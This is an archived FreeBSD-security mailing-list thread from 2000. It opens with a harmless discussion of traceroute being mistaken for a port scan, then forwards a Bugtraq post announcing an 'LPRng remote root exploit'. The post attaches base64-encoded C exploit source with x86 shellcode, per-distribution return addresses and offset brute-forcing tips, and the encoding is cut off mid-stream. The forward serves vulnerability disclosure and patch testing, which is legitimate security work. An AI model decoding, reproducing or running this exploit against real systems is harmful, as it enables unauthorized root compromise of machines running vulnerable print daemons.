-0500 Date: Thu, 14 Dec 2000 20:29:31 -0500 (EST) From: Mikhail Kruk To: Subject: mindspring complains about intrusive port scans Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@daedalus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi I got the following message from my DSL provider. I think that the logs they show are caused by me running ping and traceroute on some host on their network. (note that I've substituted my ip by xxx.xxx.xxx.xxx in the logs just in case) So my questions are: a) is there any chance that I'm wrong and this log is not caused by ping/traceroute? b) can they accuse me of violating anything because I run traceroute? Sounds like bs to me... included message: From abuse@mindspring.net Thu Dec 14 20:23:57 2000 Date: Thu, 14 Dec 2000 17:27:13 -0500 (EST) From: abuse@mindspring.net To: bkruk@ix.netcom.com Subject: Issue 001214-18234395 Hello, We have recently received a complaint of intrusive port scans. Upon investigating, we have determined that this alleged abuse is originating from your account. In a case like this, we like to let you know about the report, so that you may take a moment to review our policies regarding network unfriendly activity and netiquette. It is our hope that by notifying you of the report, we are helping to avoid any further incidents of this nature. Please view our appropriate use policy, it is available at: http://www.mindspring.net/aboutms/policy.html Pay particular attention to the following section: "Privacy violations: Attempts, whether successful or unsuccessful, to gain access to any electronic systems, networks or data, without proper consent, are prohibited." These types of cases are often escalated by some sort of misunderstanding, by keeping us informed, you will be helping us avoid that. Regards, Erich Hablutzel EarthLink/MindSpring AUP Abuse Investigator ----------------------------------------------------------------------------- portion of logs detailing incident: FWIN,2000/12/11,18:39:54 +10:00 GMT,xxx.xxx.xxx.xxx:0,203.164.30.182:0,ICMP FWIN,2000/12/11,18:40:16 +10:00 GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33489,UDP FWIN,2000/12/11,18:40:20 +10:00 GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33490,UDP WIN,2000/12/11,18:40:26 +10:00 GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33491,UDP ----------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:32:54 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:32:51 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 3934F37B400 for ; Thu, 14 Dec 2000 17:32:49 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 146jjv-0000Az-00; Fri, 15 Dec 2000 03:32:51 +0200 Date: Fri, 15 Dec 2000 03:32:51 +0200 (IST) From: Roman Shterenzon To: Mikhail Kruk Cc: Subject: Re: mindspring complains about intrusive port scans In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Seems like traceroute to me, and I don't see anything violative here. They're just not used to udp traceroute I guess. Windows uses icmp traceroutes. On Thu, 14 Dec 2000, Mikhail Kruk wrote: > Hi > I got the following message from my DSL provider. > I think that the logs they show are caused by me running ping and > traceroute on some host on their network. (note that I've substituted my > ip by xxx.xxx.xxx.xxx in the logs just in case) > > So my questions are: > a) is there any chance that I'm wrong and this log is not caused by > ping/traceroute? > b) can they accuse me of violating anything because I run traceroute? > Sounds like bs to me... > > included message: > > >From abuse@mindspring.net Thu Dec 14 20:23:57 2000 > Date: Thu, 14 Dec 2000 17:27:13 -0500 (EST) > From: abuse@mindspring.net > To: bkruk@ix.netcom.com > Subject: Issue 001214-18234395 > > Hello, > > We have recently received a complaint of intrusive port scans. Upon > investigating, we have determined that this alleged abuse is originating > from your account. In a case like this, we like to let you know about the > report, so that you may take a moment to review our policies regarding > network unfriendly activity and netiquette. It is our hope that by > notifying you of the report, we are helping to avoid any further incidents > of this nature. > > Please view our appropriate use policy, it is available at: > > http://www.mindspring.net/aboutms/policy.html > > Pay particular attention to the following section: > > "Privacy violations: > Attempts, whether successful or unsuccessful, to gain access to any > electronic systems, networks or data, without proper consent, are > prohibited." > > These types of cases are often escalated by some sort of misunderstanding, > by keeping us informed, you will be helping us avoid that. > > Regards, > > Erich Hablutzel > > EarthLink/MindSpring AUP Abuse Investigator > > ----------------------------------------------------------------------------- > > portion of logs detailing incident: > > > FWIN,2000/12/11,18:39:54 +10:00 > GMT,xxx.xxx.xxx.xxx:0,203.164.30.182:0,ICMP > > FWIN,2000/12/11,18:40:16 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33489,UDP > > FWIN,2000/12/11,18:40:20 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33490,UDP > > WIN,2000/12/11,18:40:26 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33491,UDP > ----------------------------------------------------------------------------- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:33: 9 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:32:54 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 74E9537B404 for ; Thu, 14 Dec 2000 17:32:54 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id RAA18135; Thu, 14 Dec 2000 17:32:38 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda18133; Thu Dec 14 17:32:18 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBF1W7e04581; Thu, 14 Dec 2000 17:32:07 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdRj4575; Thu Dec 14 17:31:26 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eBF1VPa05764; Thu, 14 Dec 2000 17:31:25 -0800 (PST) Message-Id: <200012150131.eBF1VPa05764@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdvE5760; Thu Dec 14 17:30:54 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.2-RELEASE X-Sender: cy To: desmo@bandwidth.org Cc: freebsd-security@freebsd.org Subject: LPRng remote root exploit (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 14 Dec 2000 17:30:52 -0800 Sender: cy@uumail.gov.bc.ca Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is just a heads up. Anyone care to test this with our LPRng port? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message Return-Path: cschuber@osg.gov.bc.ca Delivery-Date: Thu Dec 14 15:08:20 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eBEN8Kk00964 for ; Thu, 14 Dec 2000 15:08:20 -0800 (PST) Received: from passer9.cwsent.com(10.2.2.2), claiming to be "passer.osg.gov.bc.ca" via SMTP by cwsys9.cwsent.com, id smtpdcQt962; Thu Dec 14 15:08:00 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBEN7xT00432 for ; Thu, 14 Dec 2000 15:07:59 -0800 (PST) Resent-Message-Id: <200012142307.eBEN7xT00432@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdDAC411; Thu Dec 14 15:06:58 2000 Delivery-Date: Thu, 14 Dec 2000 15:06:58 -0800 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBEN6sJ00368 for ; Thu, 14 Dec 2000 15:06:54 -0800 (PST) Received: from point.osg.gov.bc.ca(142.32.102.44) via SMTP by passer.osg.gov.bc.ca, id smtpdE33438; Thu Dec 14 15:04:34 2000 Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id PAA17775 for ; Thu, 14 Dec 2000 15:04:34 -0800 Received: from lists.securityfocus.com(207.126.127.68) via SMTP by point.osg.gov.bc.ca, id smtpda17773; Thu Dec 14 15:04:15 2000 Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68]) by lists.securityfocus.com (Postfix) with ESMTP id EB6BF24D4A8; Thu, 14 Dec 2000 14:41:40 -0800 (PST) Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM (LISTSERV-TCP/IP release 1.8d) with spool id 20339565 for BUGTRAQ@LISTS.SECURITYFOCUS.COM; Thu, 14 Dec 2000 14:39:42 -0800 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by lists.securityfocus.com (Postfix) with SMTP id E599424E3D8 for ; Wed, 13 Dec 2000 18:42:50 -0800 (PST) Received: (qmail 22081 invoked by alias); 14 Dec 2000 02:42:47 -0000 Delivered-To: bugtraq@securityfocus.com Received: (qmail 22035 invoked from network); 14 Dec 2000 02:42:41 -0000 Received: from host18083.websa.com.ar (HELO powerhouse.is.penguinpowered.com.ar) (200.45.18.83) by mail.securityfocus.com with SMTP; 14 Dec 2000 02:42:41 -0000 Received: from localhost (venomous@localhost) by powerhouse.is.penguinpowered.com.ar (8.9.3/8.9.3) with ESMTP id XAA03033 for ; Wed, 13 Dec 2000 23:41:26 -0300 X-Authentication-Warning: powerhouse.is.penguinpowered.com.ar: venomous owned process doing -bs X-Sender: venomous@powerhouse.is.penguinpowered.com.ar MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-1307901943-976761685=:2 576" Message-ID: Date: Wed, 13 Dec 2000 23:41:25 -0300 Reply-To: venomous Sender: Bugtraq List From: venomous Subject: LPRng remote root exploit To: BUGTRAQ@SECURITYFOCUS.COM Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Thu, 14 Dec 2000 15:06:58 -0800 Resent-From: Cy Schubert This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. - --8323328-1307901943-976761685=:2576 Content-Type: TEXT/PLAIN; charset=US-ASCII LPRng-3.6.22/23/24 remote root exploit, enjoy. venomous of rdC venomous@rdcrew.com.ar http://www.rdcrew.com.ar - --8323328-1307901943-976761685=:2576 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="rdC-LPRng.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="rdC-LPRng.c" LyoNCiAqICAgIFJFTU9URSBST09UIEVYUExPSVQgZm9yIGxpbnV4IHg4NiAt IExQUm5nLTMuNi4yNC0xIChSZWRIYXQgNy4wKQ0KICoNCiAqIFRoZSBSZWRI YXQgNy4wIHJlcGxhY2VkIHRoZSBCU0QgbHByIHdpdGggdGhlIExQUm5nIHBh Y2thZ2Ugd2hpY2ggaXMgDQogKiB2dWxuZXJhYmxlIHRvIGZvcm1hdCBzdHJp bmcgYXR0YWNrcyBiZWNhdXNlIGl0IHBhc3NlcyBpbmZvcm1hdGlvbg0KICog dG8gdGhlIHN5c2xvZyBpbmNvcnJlY3RseS4NCiAqIFlvdSBjYW4gZ2V0IHJl bW90ZSByb290IGFjY2VzcyBvbiBtYWNoaW5lcyBydW5uaW5nIFJlZEhhdCA3 LjAgd2l0aA0KICogbHBkIHJ1bm5pbmcgKHBvcnQgNTE1L3RjcCkgaWYgaXQg aXMgbm90IGZpeGVkLCBvZiBjb3Vyc2UgKDMuNi4yNSkuDQogKg0KICogYm9u dXM6IEkgdGVzdGVkIGl0IHRvbyBvbiBzbGFja3dhcmUgNy4wIHdpdGggTFBS bmczLjYuMjItMSwgcmVtZW1iZXINCiAqIGlzIC1ub3QtIGluc3RhbGxlZCBi eSBkZWZhdWx0IChpc250IGEgcGFja2FnZSBvZiB0aGUgc2xhY2t3YXJlKS4N CiAqDQogKiBhbmQsLi4gdGhpcyBjb2RlIGlzIGZvciBlZHVjYXRpb25hbCBw cm9wb3Vyc2VzIG9ubHksIGRvIG5vdCB1c2UNCiAqIGl0IG9uIHJlbW90ZSBt YWNoaW5lcyB3aXRob3V0IGF1dGhvcml6YXRpb24uDQogKg0KICogZ3JlZXRz OiBicnVqMCwga2EweiwgZG4wLCAjcmRDIGFuZCAjZmxhdGxpbmUNCiAqDQog KiBjb2RlZCBieSB2ZW5vbW91cyBvZiByZEMgLSBBcmdlbnRpbmlhbiBzZWN1 cml0eSBncm91cC4NCiAqIHZlbm9tb3VzQHJkY3Jldy5jb20uYXINCiAqIGh0 dHA6Ly93d3cucmRjcmV3LmNvbS5hcg0KICoNCiAqLw0KDQojaW5jbHVkZSA8 c3RkaW8uaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxuZXRk Yi5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzeXMv c29ja2V0Lmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8 c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxl cnJuby5oPg0KI2luY2x1ZGUgPHRpbWUuaD4NCiNpbmNsdWRlIDxzaWduYWwu aD4NCg0KY2hhciBzaGVsbGNvZGVbXT0gLy8gbm90IG1pbmUNCiJceDMxXHhj MFx4MzFceGRiXHgzMVx4YzlceGIzXHgwN1x4ZWJceDY3XHg1Zlx4OGRceDRm IiANCiJceDA3XHg4ZFx4NTFceDBjXHg4OVx4NTFceDA0XHg4ZFx4NTFceDFj XHg4OVx4NTFceDA4Ig0KIlx4ODlceDQxXHgxY1x4MzFceGQyXHg4OVx4MTFc eDMxXHhjMFx4YzZceDQxXHgxY1x4MTAiDQoiXHhiMFx4NjZceGNkXHg4MFx4 ZmVceGMwXHg4MFx4NzlceDBjXHgwMlx4NzVceDA0XHgzYyINCiJceDAxXHg3 NFx4MGRceGZlXHhjMlx4ODBceGZhXHgwMVx4N2RceGUxXHgzMVx4YzBceGZl Ig0KIlx4YzBceGNkXHg4MFx4ODlceGQzXHgzMVx4YzlceDMxXHhjMFx4YjBc eDNmXHhjZFx4ODAiDQoiXHhmZVx4YzFceDgwXHhmOVx4MDNceDc1XHhmM1x4 ODlceGZiXHgzMVx4YzBceDMxXHhkMiINCiJceDg4XHg0M1x4MDdceDg5XHg1 Ylx4MDhceDhkXHg0Ylx4MDhceDg5XHg0M1x4MGNceGIwIg0KIlx4MGJceGNk XHg4MFx4MzFceGMwXHhmZVx4YzBceGNkXHg4MFx4ZThceDk0XHhmZlx4ZmYi DQoiXHhmZlx4MmZceDYyXHg2OVx4NmVceDJmXHg3M1x4NjgiOw0KDQp2b2lk IHVzYWdlKGNoYXIgKnByb2cpOw0Kdm9pZCBtYWtlYnVmZmVyKGNoYXIgKmFk ZHIsIGNoYXIgKnNoYWRkciwgaW50IGFkZHJvZmZzZXQsIGludCBzaG9mZnNl dCwgaW50IHBhZGRpbmcgLCBpbnQgZnNjKTsNCnZvaWQgc2lnaW50KCk7DQp2 b2lkIHNpZ2FsYXJtKCk7DQp2b2lkIG1rX2Nvbm5lY3QoY2hhciB2aWN0aW1b MTI4XSwgaW50IHBvcnQpOw0KDQpjaGFyIHlhaG9vWzEwMjRdOw0KDQpzdHJ1 Y3Qgb3MNCnsNCgljaGFyICphZGRyOw0KCWNoYXIgKnNoZWxsYWRkcjsNCglj aGFyICpkZXNjOw0KCWludCBhZGRyb2Zmc2V0Ow0KCWludCBzaGVsbGFkZHJv ZmZzZXQ7DQoJaW50IHBhZDsNCglpbnQgZnNjOw0KfTsNCg0KLyogZ2VuZXJh bGx5LCB0aGUgYWRkcmVzc2VzIGFyZSB3cm9uZyBmb3IgYSB2ZXJ5IHNtYWxs IHZhbHVlLCwgaSByZWNvbW1lbmQNCiAqIHRoYXQgeW91IGJydXRlZm9yY2Ug dGhlIHJldGxvYyArIG9yIC0gYnkgMS4uKGV4OiAtNTAgdG8gKzUwLCBzdGVw cyBvZiAxKQ0KICogaWYgaXQgZG9udCB3b3JrLCB0cnkgdGhlIHNhbWUgYnV0 IGNoYW5naW5nIHRoZSBmc2MgKHRoaXMgaXMgdGhlIHZhbHVlDQogKiBvZiB3 aGVuIHdlIHN0YXJ0IHRvIGNvbnRyb2wgdGhlIGZvcm1hdHMgc3RyaW5ncyks IHN0YXJ0IGZyb20gMjkwIHVudGlsDQogKiAzMzAsIGl0IHNob3VsZCBiZSBl bm91Z2guDQogKiBhbmQgaWYgaXQgc3RpbGwgZG9udCB3b3JrLCwgOnwsIHRy eSB3aXRoIHRoZSBvZmZzZXQgb2YgdGhlIHNoZWxsY29kZQ0KICogYWRkcmVz cywgdGhpcyBidWZmZXIgaGFzIG5vcHMsIHNvIGl0IHNob3VsZG50IGJlIGRp ZmZpY3VsdCB0byBndWVzcy4NCiAqIG1ha2UgYSAuc2ghIDopDQogKiBvZiBj b3Vyc2UsIHlvdSBjYW4gc3RhcnQgZ2RiIG9uIHlvdXIgYm94KGVzKSBhbmQg ZG9udCBndWVzcyBub3RoaW5nDQogKiBqdXN0IGluc3BlY3QgdGhlIHByb2dy YW0gYW5kIGdldCB0aGUgY29ycmVjdCB2YWx1ZXMhDQogKg0KICogLXZlbm9t b3VzDQogKi8NCg0Kc3RydWN0IG9zIHRhcmdldFtdPQ0Kew0KCXsiMHhiZmZm ZWUzMCIsICIweGJmZmZmNjQwIiwgIlNsYWNrd2FyZSA3LjAgd2l0aCBMUFJu Zy0zLjYuMjIudGd6IC0gc3RhcnRlZCBmcm9tIHNoZWxsIiwgMCwgMCwgMiwg Mjk5fSwNCiAgICAgICAgeyIweGJmZmZmMGYwIiwgIjB4YmZmZmY5MjAiLCAi UmVkSGF0IDcuMCAoR3Vpbm5lc3MpIHdpdGggTFBSbmctMy42LjIyLzIzLzI0 LTEgZnJvbSBycG0gLSBnbGliYy0yLjItNSIsIDAsIDAsIDIsIDMwNH0sDQog ICAgICAgIHtOVUxMLE5VTEwsTlVMTCwwLDB9DQp9Ow0KDQoNCm1haW4oaW50 IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsNCiAgICBpbnQgcG9ydD01MTUsDQog ICAgc289MCwNCiAgICBwYWRkaW5nPTAsDQogICAgcmV0bG9jb2Zmc2V0PTAs DQogICAgc2hlbGxjb2Rlb2Zmc2V0PTAsDQogICAgZnNjVD0wOw0KDQogICAg Y2hhciBhcmcsDQogICAgICAgIHZpY3RpbVsxMjhdLA0KICAgIHJsWzEyOF0s DQogICAgc2hbMTI4XTsNCg0KDQogICAgaWYoYXJnYyA8IDMpDQogICAgICAg IHVzYWdlKGFyZ3ZbMF0pOw0KDQogICAgYnplcm8odmljdGltLHNpemVvZih2 aWN0aW0pKTsNCiAgICBiemVybyhybCxzaXplb2YocmwpKTsNCiAgICBiemVy byhzaCxzaXplb2Yoc2gpKTsNCg0KICAgIHdoaWxlICgoYXJnID0gZ2V0b3B0 KGFyZ2MsIGFyZ3YsICJoOnA6cjpzOnQ6UDpSOlM6YyIpKSAhPSBFT0YpDQog ICAgew0KICAgICAgICBzd2l0Y2goYXJnKQ0KICAgICAgICB7DQogICAgICAg IGNhc2UgJ2gnOg0KICAgICAgICAgICAgc3RybmNweSh2aWN0aW0sb3B0YXJn LDEyOCk7DQogICAgICAgICAgICBicmVhazsNCiAgICAgICAgY2FzZSAncCc6 DQogICAgICAgICAgICBwb3J0ID0gYXRvaShvcHRhcmcpOw0KICAgICAgICAg ICAgYnJlYWs7DQogICAgICAgIGNhc2UgJ3InOg0KICAgICAgICAgICAgc3Ry bmNweShybCxvcHRhcmcsMTI4KTsNCiAgICAgICAgICAgIGJyZWFrOw0KICAg ICAgICBjYXNlICdzJzoNCiAgICAgICAgICAgIHN0cm5jcHkoc2gsb3B0YXJn LDEyOCk7DQogICAgICAgICAgICBicmVhazsNCiAgICAgICAgY2FzZSAndCc6 DQogICAgICAgICAgICBzbyA9IGF0b2kob3B0YXJnKTsNCiAgICAgICAgICAg IGJyZWFrOw0KICAgICAgICBjYXNlICdQJzoNCiAgICAgICAgICAgIHBhZGRp bmcgPSBhdG9pKG9wdGFyZyk7DQogICAgICAgICAgICBicmVhazsNCiAgICAg ICAgY2FzZSAnUic6DQogICAgICAgICAgICByZXRsb2NvZmZzZXQgPSBhdG9p KG9wdGFyZyk7DQogICAgICAgICAgICBicmVhazsNCiAgICAgICAgY2FzZSAn Uyc6DQogICAgICAgICAgICBzaGVsbGNvZGVvZmZzZXQgPSBhdG9pKG9wdGFy Zyk7DQogICAgICAgICAgICBicmVhazsNCiAgICAgICAgY2FzZSAnYyc6DQog ICAgICAgICAgICBmc2NUID0gYXRvaShvcHRhcmcpOw0KICAgICAgICAgICAg YnJlYWs7DQogICAgICAgIGRlZmF1bHQ6DQogICAgICAgICAgICB1c2FnZShh cmd2WzBdKTsNCiAgICAgICAgICAgIGJyZWFrOw0KICAgICAgICB9DQogICAg fQ0KDQogICAgaWYoc3RybGVuKHZpY3RpbSkgPT0gMCkNCiAgICAgICAgdXNh Z2UoYXJndlswXSk7DQoNCiAgICBpZiAoc3RyY21wKHJsLCIiKSkNCiAgICAg ICAgdGFyZ2V0W3NvXS5hZGRyID0gcmw7DQoNCiAgICBpZiAoc3RyY21wKHNo LCIiKSkNCiAgICAgICAgdGFyZ2V0W3NvXS5zaGVsbGFkZHIgPSBzaDsNCg0K ICAgIGlmIChyZXRsb2NvZmZzZXQgIT0gMCkNCiAgICAgICAgdGFyZ2V0W3Nv XS5hZGRyb2Zmc2V0ID0gdGFyZ2V0W3NvXS5hZGRyb2Zmc2V0ICsgcmV0bG9j b2Zmc2V0Ow0KDQogICAgaWYgKHNoZWxsY29kZW9mZnNldCAhPSAwKQ0KICAg ICAgICB0YXJnZXRbc29dLnNoZWxsYWRkcm9mZnNldCA9IHRhcmdldFtzb10u c2hlbGxhZGRyb2Zmc2V0ICsgc2hlbGxjb2Rlb2Zmc2V0Ow0KDQogICAgaWYg KHBhZGRpbmcgIT0gMCkNCiAgICAgICAgdGFyZ2V0W3NvXS5wYWQgPSB0YXJn ZXRbc29dLnBhZCArIHBhZGRpbmc7DQoNCiAgICBpZiAoZnNjVCAhPSAwKQ0K ICAgICAgICB0YXJnZXRbc29dLmZzYyA9IHRhcmdldFtzb10uZnNjICsgZnNj VDsNCg0KICAgIHNpZ25hbChTSUdJTlQsIHNpZ2ludCk7DQogICAgbWFrZWJ1 ZmZlcih0YXJnZXRbc29dLmFkZHIsIHRhcmdldFtzb10uc2hlbGxhZGRyLCB0 YXJnZXRbc29dLmFkZHJvZmZzZXQsIHRhcmdldFtzb10uc2hlbGxhZGRyb2Zm c2V0LCB0YXJnZXRbc29dLnBhZCwgdGFyZ2V0W3NvXS5mc2MpOw0KICAgIG1r X2Nvbm5lY3QodmljdGltLCBwb3J0KTsNCg0KfQ0KDQp2b2lkIG1ha2VidWZm ZXIoY2hhciAqYWRkciwgY2hhciAqc2hhZGRyLCBpbnQgYWRkcm9mZnNldCwg aW50IHNob2Zmc2V0LCBpbnQgcGFkZGluZywgaW50IGZzYykNCnsNCiAgICBj aGFyICp0bXAsDQogICAgYWRkcnRtcFsyMTZdLA0KICAgIG90WzEyOF07DQoN CiAgICBpbnQgaSxiLHgsdDsNCiAgICB1bnNpZ25lZCBsb25nIHB0Ow0KDQog ICAgY2hhciB0ZW1wWzEyOF07DQogICAgY2hhciBhMSxhMixhMyxhNCxhNSxh NixhNyxhODsNCiAgICBjaGFyIGZpclsxMl0sc2VjWzEyXSx0aHJbMTJdLGYw clsxMl07DQogICAgdW5zaWduZWQgbG9uZyBmaXJsLHNlY2wsdGhybCxmb3Js Ow0KICAgIHVuc2lnbmVkIGxvbmcgcGFzMSxwYXMyLHBhczMscGFzNDsNCg0K DQogICAgYnplcm8oeWFob28sc2l6ZW9mKHlhaG9vKSk7DQogICAgYnplcm8o b3Qsc2l6ZW9mKG90KSk7DQogICAgYnplcm8oYWRkcnRtcCxzaXplb2YoYWRk cnRtcCkpOw0KDQogICAgcHJpbnRmKCIqKiBMUFJuZyByZW1vdGUgcm9vdCBl eHBsb2l0IGNvZGVkIGJ5IHZlbm9tb3VzIG9mIHJkQyAqKlxuIik7DQogICAg cHJpbnRmKCJcbmNvbnN0cnVjdGluZyB0aGUgYnVmZmVyOlxuXG4iKTsNCiAg ICBwcmludGYoImFkZGluZyBieXRlcyBmb3IgcGFkZGluZzogJWRcbiIscGFk ZGluZyk7DQogICAgZm9yKGk9MCA7IGkgPCBwYWRkaW5nIDsgaSsrKQ0KICAg ICAgICBzdHJjYXQoeWFob28sIkEiKTsNCg0KICAgIHRtcCA9IGFkZHI7DQog ICAgcHQgPSBzdHJ0b3VsKGFkZHIsICZhZGRyLDE2KSArIGFkZHJvZmZzZXQ7 DQogICAgYWRkciA9IHRtcDsNCiAgICBwcmludGYoInJldGxvYzogJXMgKyBv ZmZzZXQoJWQpID09ICVwXG4iLCBhZGRyLCBhZGRyb2Zmc2V0LCBwdCk7DQog ICAgcHJpbnRmKCJhZGRpbmcgcmVzdWx0aW5nIHJldGxvYyglcCkuLlxuIixw dCk7DQogICAgc3ByaW50ZihhZGRydG1wLCAiJXAiLCBwdCk7DQogICAgaWYo c3RybGVuKGFkZHIpICE9IDEwKQ0KICAgIHsNCiAgICAgICAgcHJpbnRmKCJF cnJvciwgcmV0bG9jIGlzICVkIGJ5dGVzIGxvbmcsIHNob3VsZCBiZSAxMFxu IixzdHJsZW4oYWRkcikpOw0KICAgICAgICBleGl0KDEpOw0KICAgIH0NCg0K ICAgIHB0ID0gMDsNCg0KICAgIGZvciAoaT0wIDsgaSA8IDQgOyBpKyspDQog ICAgew0KICAgICAgICBwdCA9IHN0cnRvdWwoYWRkcnRtcCwgJmFkZHJ0bXAs IDE2KTsNCiAgICAgICAgLy9zdHJjYXQoeWFob28sICZwdCk7DQogICAgICAg IGJ6ZXJvKG90LHNpemVvZihvdCkpOw0KICAgICAgICBzcHJpbnRmKG90LCIl cyIsJnB0KTsNCiAgICAgICAgc3RybmNhdCh5YWhvbyxvdCw0KTsNCiAgICAg ICAgcHQrKzsNCiAgICAgICAgc3ByaW50ZihhZGRydG1wLCAiJXAiLCBwdCk7 DQogICAgICAgIC8vcHJpbnRmKCJhZGRydG1wOiVzIDp5YWhvbyAlc1xuIixh ZGRydG1wLHlhaG9vKTsNCiAgICB9DQoNCiAgICB0bXAgPSBzaGFkZHI7DQog ICAgcHQgPSAwOw0KICAgIHB0ID0gc3RydG91bChzaGFkZHIsJnNoYWRkciwx NikgKyBzaG9mZnNldDsNCiAgICBzcHJpbnRmKG90LCIlcCIscHQpOw0KICAg IHNoYWRkciA9IG90Ow0KDQogICAgcHJpbnRmKCJhZGRpbmcgc2hlbGxjb2Rl IGFkZHJlc3MoJXMpXG4iLCBzaGFkZHIpOw0KICAgIHNzY2FuZihzaGFkZHIs IjB4JWMlYyVjJWMlYyVjJWMlYyIsJmExLCZhMiwmYTMsJmE0LCZhNSwmYTYs JmE3LCZhOCk7DQoNCiAgICBzcHJpbnRmKGZpciwiMHglYyVjIixhMSxhMik7 DQogICAgc3ByaW50ZihzZWMsIjB4JWMlYyIsYTMsYTQpOw0KICAgIHNwcmlu dGYodGhyLCIweCVjJWMiLGE1LGE2KTsNCiAgICBzcHJpbnRmKGYwciwiMHgl YyVjIixhNyxhOCk7DQoNCiAgICBmaXJsID0gc3RydG91bChmaXIsJmZpciwx Nik7DQogICAgc2VjbCA9IHN0cnRvdWwoc2VjLCZzZWMsMTYpOw0KICAgIHRo cmwgPSBzdHJ0b3VsKHRociwmdGhyLDE2KTsNCiAgICBmb3JsID0gc3RydG91 bChmMHIsJmYwciwxNik7DQoNCiAgICBwYXMxID0gZm9ybCAtIDUwIC0gcGFk ZGluZzsNCiAgICBwYXMxID0gY2hlY2tfbmVnYXRpdmUocGFzMSk7DQoNCiAg ICBwYXMyID0gdGhybCAtIGZvcmw7DQogICAgcGFzMiA9IGNoZWNrX25lZ2F0 aXZlKHBhczIpOw0KDQogICAgcGFzMyA9IHNlY2wgLSB0aHJsOw0KICAgIHBh czMgPSBjaGVja19uZWdhdGl2ZShwYXMzKTsNCg0KICAgIHBhczQgPSBmaXJs IC0gc2VjbDsNCiAgICBwYXM0ID0gY2hlY2tfbmVnYXRpdmUocGFzNCk7DQoN CiAgICBzcHJpbnRmKHRlbXAsIiUlLiVkdSUlJWQkbiUlLiVkdSUlJWQkbiUl LiVkdSUlJWQkbiUlLiVkdSUlJWQkbiIscGFzMSxmc2MsIHBhczIsIGZzYysx LCBwYXMzLCBmc2MrMixwYXM0LCBmc2MrMyk7DQogICAgc3RyY2F0KHlhaG9v 